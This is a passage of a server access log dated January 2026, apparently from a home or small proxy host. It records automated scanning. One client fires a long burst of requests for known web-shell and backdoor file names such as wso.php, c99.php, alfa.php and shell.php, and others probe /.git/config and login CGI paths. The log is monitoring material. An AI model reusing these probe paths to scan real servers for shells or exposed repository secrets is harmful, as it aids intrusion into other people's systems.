+[29/Jan/2026:07:20:14 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[29/Jan/2026:07:32:33 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:07:33:14 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:07:34:11 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:07:45:31 +0000] 400 - GET http 91.82.215.191 "/" [Client 185.12.59.118] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0" "-" +[29/Jan/2026:07:54:47 +0000] 400 - GET http 91.82.215.191 "/cgi-bin/authLogin.cgi" [Client 134.209.240.225] [Length 252] [Gzip -] "Go-http-client/1.1" "-" +[29/Jan/2026:07:58:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/plugins/hellopress/wp_filemanager.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:54 +0000] 404 - GET http profibot.direct.quickconnect.to "//autoload_classmap.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:54 +0000] 404 - GET http profibot.direct.quickconnect.to "//alfa.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:54 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-includes/assets/index.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/luxe.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/update/wpupex.php/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:54 +0000] 404 - GET http profibot.direct.quickconnect.to "/rezor.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:55 +0000] 404 - GET http profibot.direct.quickconnect.to "//doc.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:55 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-admin/user/index.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:55 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-includes/css/about.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:55 +0000] 404 - GET http profibot.direct.quickconnect.to "//install.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/~norapump/hah.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/sto.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:55 +0000] 404 - GET http profibot.direct.quickconnect.to "//x.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:55 +0000] 404 - GET http profibot.direct.quickconnect.to "//test.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:55 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/blocks/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/n3.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/install.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/o.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:56 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-includes/ID3/index.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/class-t.api.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:56 +0000] 404 - GET http profibot.direct.quickconnect.to "/.trash7309/f/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:56 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:56 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-includes/customize/index.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:56 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/themes/seotheme/mar.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:57 +0000] 404 - GET http profibot.direct.quickconnect.to "//h.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:57 +0000] 404 - GET http profibot.direct.quickconnect.to "//skin/install/default/security.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/wrt.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:57 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/plugins/Core-EconX/up.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/css/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/images/c99.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:57 +0000] 404 - GET http profibot.direct.quickconnect.to "/png.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:57 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-includes/ID3/index.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:57 +0000] 404 - GET http profibot.direct.quickconnect.to "//zwso.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:58 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/languages/index.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:58 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp/wp-includes//index.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/ton.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:58 +0000] 404 - GET http profibot.direct.quickconnect.to "//wso.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/images/fk2e3/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/a2.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/shell.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/IXR/moon.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:58 +0000] 404 - GET http profibot.direct.quickconnect.to "/sxo.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:59 +0000] 404 - GET http profibot.direct.quickconnect.to "//admin.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:59 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/mans.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:59 +0000] 404 - GET http profibot.direct.quickconnect.to "//dropdown.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/WordPress/x/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/ze.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:59 +0000] 404 - GET http profibot.direct.quickconnect.to "//geck.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:58:59 +0000] 404 - GET http profibot.direct.quickconnect.to "/menu.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:00 +0000] 404 - GET http profibot.direct.quickconnect.to "//admin/function.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:00 +0000] 404 - GET http profibot.direct.quickconnect.to "//index/function.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/flower.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/ftp.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/mds.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/ahax.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:00 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-admin/class-db.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/cool.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:00 +0000] 404 - GET http profibot.direct.quickconnect.to "/gm.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:01 +0000] 404 - GET http profibot.direct.quickconnect.to "//simple.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:01 +0000] 404 - GET http profibot.direct.quickconnect.to "//elp.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/bolt.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:01 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/uploads/index.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:01 +0000] 404 - GET http profibot.direct.quickconnect.to "//inputs.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/.trash7309/fafa/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/system.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/maint/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:01 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-admin/network/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/museu/yhweq.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/an.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:02 +0000] 404 - GET http profibot.direct.quickconnect.to "//w.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/gmo.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/gib.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-miiss.php.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/ho/wpup.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:02 +0000] 404 - GET http profibot.direct.quickconnect.to "//moon.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:02 +0000] 404 - GET http profibot.direct.quickconnect.to "/filesss.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/hey.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:03 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/themes/seotheme/mar.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:03 +0000] 404 - GET http profibot.direct.quickconnect.to "//1337.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:03 +0000] 404 - GET http profibot.direct.quickconnect.to "//buy.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/apsarasarts/okk.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/m.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-is.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/jmfi2.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:03 +0000] 404 - GET http profibot.direct.quickconnect.to "//about/function.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:03 +0000] 404 - GET http profibot.direct.quickconnect.to "/bnn_.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:04 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/json.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:04 +0000] 404 - GET http profibot.direct.quickconnect.to "/hzz.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:04 +0000] 404 - GET http profibot.direct.quickconnect.to "//shell20211028.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:04 +0000] 404 - GET http profibot.direct.quickconnect.to "//content.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:04 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-content/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:04 +0000] 404 - GET http profibot.direct.quickconnect.to "/ps.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:04 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/themes/about.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:04 +0000] 404 - GET http profibot.direct.quickconnect.to "/.trash7309/dd/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:04 +0000] 404 - GET http profibot.direct.quickconnect.to "/cache.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/ss.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/p.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:05 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/plugins/achdxhv/languages/admin.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:05 +0000] 404 - GET http profibot.direct.quickconnect.to "//user.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-includes/block-patterns/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:05 +0000] 404 - GET http profibot.direct.quickconnect.to "//index/function.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/rip.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:05 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp4.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:06 +0000] 404 - GET http profibot.direct.quickconnect.to "//403.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:06 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-admin/maint/index.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/asd67.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:06 +0000] 404 - GET http profibot.direct.quickconnect.to "//sad/about.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/oivcl.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:06 +0000] 404 - GET http profibot.direct.quickconnect.to "//about.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:06 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/themes/deeto/login.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:06 +0000] 404 - GET http profibot.direct.quickconnect.to "/v2.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:06 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/themes/hideo/network.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/x/" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:07 +0000] 404 - GET http profibot.direct.quickconnect.to "//.cache/x.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/dr.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/raw.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:07 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-includes/css/about.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:07 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/index.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/ioxi-o2.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/dropdown.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:07 +0000] 404 - GET http profibot.direct.quickconnect.to "/dlu.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:08 +0000] 404 - GET http profibot.direct.quickconnect.to "//wp-content/about.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/db.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/packed.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/wp-configs.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:08 +0000] 404 - GET http profibot.direct.quickconnect.to "//404.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/des.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:08 +0000] 404 - GET http profibot.direct.quickconnect.to "/.well-known/content.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:08 +0000] 404 - GET http profibot.direct.quickconnect.to "//lufix.php" [Client 172.190.142.176] [Length 150] [Gzip -] "-" "-" +[29/Jan/2026:07:59:22 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:08:09:55 +0000] 200 - GET http 91.82.215.191 "/" [Client 3.130.96.91] [Length 568] [Gzip 1.86] "cypex.ai/scanning Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) Chrome/126.0.0.0 Safari/537.36" "-" +[29/Jan/2026:08:11:17 +0000] 400 - - http localhost-nginx-proxy-manager "-" [Client 3.130.96.91] [Length 0] [Gzip -] "-" "-" +[29/Jan/2026:08:21:05 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:08:39:31 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:08:43:45 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:09:08:56 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:09:18:43 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:09:31:57 +0000] 200 - GET http 91.82.215.191 "/" [Client 195.3.221.8] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:09:32:08 +0000] 200 - HEAD http 91.82.215.191 "/" [Client 176.65.148.66] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org )" "-" +[29/Jan/2026:09:32:08 +0000] 206 - GET http 91.82.215.191 "/" [Client 176.65.148.66] [Length 1033] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org )" "-" +[29/Jan/2026:09:32:09 +0000] 404 - HEAD http 91.82.215.191 "/_next" [Client 176.65.148.66] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org )" "-" +[29/Jan/2026:09:32:10 +0000] 405 - POST http 91.82.215.191 "/" [Client 176.65.148.66] [Length 154] [Gzip -] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org )" "-" +[29/Jan/2026:09:32:12 +0000] 404 - POST http 91.82.215.191 "/_next" [Client 176.65.148.66] [Length 122] [Gzip 1.35] "Mozilla/5.0 (compatible; Let's Encrypt validation server; +https://www.letsencrypt.org )" "-" +[29/Jan/2026:09:41:56 +0000] 404 - GET http 91.82.215.191 "/.git/config" [Client 45.148.10.124] [Length 122] [Gzip 1.35] "Links/0.9.1 (Linux 2.4.24; i386;)" "-" +[29/Jan/2026:09:42:05 +0000] 404 - GET http 91.82.215.191 "/.git/config" [Client 45.148.10.124] [Length 122] [Gzip 1.35] "EmailWolf 1.00" "-" +[29/Jan/2026:09:44:24 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:09:45:54 +0000] 405 - POST http 91.82.215.191 "/" [Client 193.142.147.209] [Length 154] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" "-" +[29/Jan/2026:09:57:31 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" +[29/Jan/2026:10:04:16 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.52.199] [Length 568] [Gzip 1.86] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:10:05:59 +0000] 404 - GET http 91.82.215.191 "/SDK/webLanguage" [Client 89.42.231.200] [Length 183] [Gzip 3.21] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46" "-" +[29/Jan/2026:10:14:11 +0000] 400 - GET http 91.82.215.191 "/" [Client 156.229.16.165] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Edg/120.0.0.0" "-" +[29/Jan/2026:10:14:12 +0000] 400 - GET http 91.82.215.191 "/favicon.ico" [Client 156.229.16.165] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[29/Jan/2026:10:14:12 +0000] 400 - GET http 91.82.215.191 "/robots.txt" [Client 156.229.16.165] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[29/Jan/2026:10:14:12 +0000] 400 - GET http 91.82.215.191 "/sitemap.xml" [Client 156.229.16.165] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_0) AppleWebKit/535.11 (KHTML, like Gecko) Chrome/17.0.963.56 Safari/535.11" "-" +[29/Jan/2026:10:17:15 +0000] 200 - GET http 91.82.215.191 "/" [Client 95.214.54.147] [Length 1033] [Gzip -] "Mozilla/5.0" "-" +[29/Jan/2026:10:26:22 +0000] 400 - GET http 91.82.215.191 "/" [Client 92.63.197.197] [Length 654] [Gzip -] "Mozilla/5.0 